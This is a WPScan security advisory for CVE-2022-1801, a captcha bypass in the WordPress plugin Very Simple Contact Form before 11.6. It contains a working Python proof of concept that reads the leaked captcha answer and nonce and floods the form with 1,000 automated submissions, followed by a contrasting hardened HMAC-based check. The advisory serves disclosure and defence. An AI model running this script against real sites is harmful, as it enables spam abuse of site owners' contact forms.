WPScan

WordPress Plugin Vulnerabilities

Very Simple Contact Form < 11.6 - Captcha bypass

Description

The plugin exposes the solution to the captcha in the rendered contact form, both as hidden input fields and as plain text in the page. This makes it very easy for bots to bypass the captcha check, so any page that carries the form is a likely target for spam bots.

Proof of Concept

import requests
from bs4 import BeautifulSoup
# usage: python3 captcher.py

# URL of a WP page that embeds the plugin's contact form.
url = "http://192.168.1.5/index.php/just-some-test-dude/"
proxies = {"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"}

# Extracts the value of the input field with the given id
# (used for the captcha challenge and for the nonce).
def extract_value(response, id):
    soup = BeautifulSoup(response, 'html.parser')
    tag = soup.find('input', attrs={'id': id})
    extracted = tag.get('value')
    return extracted

for i in range(1, 1001):
    s = requests.Session()
    first = s.get(url, proxies=proxies)
    # The captcha solution and the nonce are both read from the rendered form.
    captcha = extract_value(first.text, 'vscf_captcha_hidden_one')
    nonce = extract_value(first.text, 'vscf_nonce')
    data_post = {'vscf_name': 'AAA',
                 'vscf_email': "[email protected]",
                 'vscf_subject': 'aaaaa',
                 'vscf_captcha': captcha,
                 'vscf_captcha_hidden_one': captcha,
                 'vscf_captcha_hidden_two': '0',
                 'vscf_firstname': '',
                 'vscf_lastname': '',
                 'vscf_message': 'ssssssssssssssssssssssssssssssssssssssssssss',
                 'vscf_nonce': nonce,  # 80abc23916
                 '_wp_http_referer': '%2Findex.php%2Fjust-some-test-dude%2F',
                 'vscf_send': ''}
    submit = s.post(url, data=data_post, proxies=proxies)
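
An added example, not taken from the advisory or from the plugin's code: it contrasts a check that trusts an answer carried in a hidden field (modelled on the field names in the PoC request above) with a server-side design in which the form carries only a keyed MAC of the answer. The `captcha_token` field, the key handling and the in-memory token store are assumptions; rendering the challenge so that it is not readable as page text is outside its scope.

```python
import hashlib
import hmac
import secrets
import time

SERVER_KEY = secrets.token_bytes(32)  # assumption: per-site secret, never sent to the client
TTL_SECONDS = 600                     # assumption: challenge lifetime
_seen_tokens = set()                  # assumption: in-memory store; persist and expire it in production


def vulnerable_check(form):
    # Weak pattern (modelled on the PoC request, not the plugin's code):
    # the expected answer travels in a hidden field that any client can read.
    return form.get("vscf_captcha") == form.get("vscf_captcha_hidden_one")


def _mac(answer, salt, expires):
    msg = f"{answer}|{salt}|{expires}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def issue_challenge(now=None):
    """Return (answer, hidden_fields); only a keyed MAC of the answer reaches the form."""
    now = int(time.time() if now is None else now)
    answer = f"{secrets.randbelow(10**6):06d}"  # to be shown to the user, never as a field value
    salt, expires = secrets.token_hex(8), now + TTL_SECONDS
    return answer, {"captcha_token": f"{salt}.{expires}.{_mac(answer, salt, expires)}"}


def hardened_check(form, now=None):
    now = int(time.time() if now is None else now)
    token = form.get("captcha_token", "")
    try:
        salt, expires, mac = token.split(".")
        expires = int(expires)
    except ValueError:
        return False  # malformed or missing token
    if now > expires or token in _seen_tokens:
        return False  # expired, or already presented once
    _seen_tokens.add(token)  # burn on first attempt: no replay, no repeated guessing
    expected = _mac(form.get("vscf_captcha", ""), salt, expires)
    return hmac.compare_digest(expected.encode(), mac.encode())
```
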

Affects Plugins

very-simple-contact-form
Fixed in version 11.6

References

CVE: CVE-2022-1801

Classification

Type: BYPASS

Miscellaneous

Original Researcher: Sebastian Cruz Cardona
Submitter: Sebastian C. Cardona
Verified: Yes
WPVDB ID: a5c97809-2ffc-4efb-8c80-1b734361cd06

Timeline

Publicly Published: 2022-05-30 (about 11 months ago)
Added: 2022-05-30 (about 11 months ago)
Last Updated: 2023-02-26 (about 2 months ago)
